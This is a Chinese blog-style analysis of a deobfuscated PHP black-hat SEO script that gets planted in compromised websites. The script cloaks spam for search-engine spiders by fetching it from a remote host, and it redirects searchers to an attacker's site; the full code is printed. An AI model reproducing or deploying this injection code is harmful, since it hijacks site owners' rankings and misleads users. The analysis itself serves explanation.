热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全

一个做流量的黑帽SEO代码分析

发布时间:2012-08-29 11:23文章来源:网络文章作者:秩名 点击次数:
摘要:其实这个我也不是很懂!关于怎么做流量!在此之前都没有接触过!前几天有个人找我解密一段加密代码,要我帮他重新写一下! 在我对代码分析过后才懂了一些,什么叫做做流量!呵呵!原始的加密代码我就不贴了!他的加密方式不是很复杂!但是解密也是一个累人的...

    其实这个我也不是很懂!关于怎么做流量!在此之前都没有接触过!前几天有个人找我解密一段加密代码,要我帮他重新写一下!

    在我对代码分析过后才懂了一些,什么叫做做流量!呵呵!原始的加密代码我就不贴了!他的加密方式不是很复杂!但是解密也是一个累人的活!他把变量名都用的很长的随机字符,变量值都是用base64加密过的!

主要是解密过后的:

001 <?
002 error_reporting (E_ERROR);
003 $aaiak = $_SERVER['HTTP_USER_AGENT'];
004 $ecdef = $_SERVER['REMOTE_ADDR'];
005 $ohkic = $_SERVER['HTTP_REFERER'];
006 $nhamo = $_SERVER['HTTP_HOST'];
007 $mcnad = $_SERVER['REQUEST_URI'];//这句以前的代码都是获取一些相关数据
008 $ghoif = 'www.xxxxx.com';
009 $cikhc = "/client/{var}/index.php";
010 $jjaja = "/client/{var}/index.txt";
011 $kabne = array("yh" => '%D3%C0%BA%E3|%E6%B0%B8%E6%81%92|aion',"jx" => '%BD%A3|%E5%89%91',"my" => '%C4%A7%D3%F2|%E9%AD%94%E5%9F%9F',"jy" => '%BE%C5%D2%F5|%E4%B9%9D%E9%98%B4');
012 $cdfhe = array('','/','/index.php');
013 $omccd = array('Maxthon','Firefox');
014 $echha = array('125.90.93.','127.0.0.','192.168.1.');
015 $afhbj = array('baidu','google','soso','sogou','yahoo','bing','youdao');
016 $heeni = array('site%3A','inurl%3A');
017 $gccik = array_keys($_GET);
018 $cnfbe = array_keys($kabne);
019 $onbla = 'x64';
020 $emfii = explode('.',$nhamo);//把前面获取的主机ip以点为标识分割为数组
021 $mejgm = count($emfii);//这句以前都是一些变量和数组的定义
022 if($mejgm > 2)
023 {
024 $nhamo = $emfii[$mejgm-3].'.'.$emfii[$mejgm-2].'.'.$emfii[$mejgm-1];
025 }//上边的这个是取主机ip的后3位。
026 $blafk = $ilnhj = $cdbn = false;
027 foreach($kabne as $bblie => $odjhd) {
028 $mik = explode('|',$odjhd);
029  
030 //上边是遍历$kabne数组,这个和服务端的读取目录有关
031  
032 foreach($mik as $hoelc)
033 {
034 if(stristr($ohkic,$hoelc))
035 {
036 $cdbn = $bblie;
037 $ilnhj = true; break;
038 }
039 }//上边是和关键字的匹配
040 if(in_array($bblie,$gccik)) {
041 $cdbn = $bblie;
042 $ilnhj = true;
043 }
044 if($ilnhj)
045 {
046 break;
047 }
048 }
049 foreach($heeni as $behgc)
050 {
051 if(stristr($ohkic,$behgc))
052 {
053 $ilnhj = false;
054 break;
055 }
056 }
057 foreach($omccd as $ibkmo)
058 {
059 if(stristr($aaiak,$ibkmo))
060 {
061 $ilnhj = false;
062 break;
063 }
064 }
065 foreach($afhbj as $ljild)
066 {
067 if(stristr($aaiak,$ljild))
068 {
069 $blafk = true;
070 break;
071 }
072 }
073 foreach($echha as $glekm)
074 {
075 if(stristr($ecdef,$glekm))
076 {
077 $ilnhj = false;
078 $blafk = false;
079 break;
080 }
081 }//上边的就是一长串的判断匹配
082 if($blafk && (!in_array($mcnad,$cdfhe)))
083 {
084 if(!$cdbn)
085 {
086 $cdbn = $cnfbe[array_rand($cnfbe)];
087 }
088 header("content-Type: text/html; charset=gb2312");
089 $cbekb = file_get_contents ('http://' .$ghoif.str_replace('{var}',$cdbn,$cikhc).'?d='.'&r='.bin2hex($mcnad));
090 $komac = explode('[0xSpider]',$cbekb);
091 echo $komac[1];
092 exit;
093 } //输出
094 elseif($ilnhj && $cdbn && empty($_COOKIE[$onbla]))
095 {
096 setcookie($onbla,$nhamo,time() + 259200);
097 $cbekb = file_get_contents ('http://' .$ghoif.str_replace('{var}',$cdbn,$jjaja));
098 header('Location: '.base64_decode(str_rot13($cbekb)).'#'.str_replace('.','_',$nhamo));
099 exit;//跳转
100 }
101 ?>

 下面我画了图!第一次画!我都不知道我画的什么。。。汗

点击查看原图

他的做流量分为客服端和服务端,先说下他们的作用

客户端主要是主要是收集信息,比如关键字,ip等

服务端主要是储蓄数据,方便你修改!

当客服端通过一系列的判断,发现应该使用服务端的那些数据,然后就读取服务端的数据!

当你的网站被插入了上边的客户端代码,当搜索引擎抓取你的网站的时候,就会抓取到被插入的关键字,当然你用搜索引擎收东西的时候都会被收到。

比如site:www.ddd.com 梦幻西游

www.ddd.com这个站是pr权重比较高的,但是他更本不是游戏站,是个农业站什么,里面更本没有游戏有关的懂得,但是你会用浏览器搜到这个站的梦幻西游,当你点击的时候也不会进去www.ddd.com这个站,你会直接挑战到他指定的站点!

也就是他使用了你网站的搜索引擎排名.

以上都为个人理解!这个也是最近才有所了解的!错误的希望指正!

标签分类:

上一篇:利用 .htaccess 启用 gzip 压缩静态内容
下一篇:搜索引擎关键词劫持黑帽SEO之php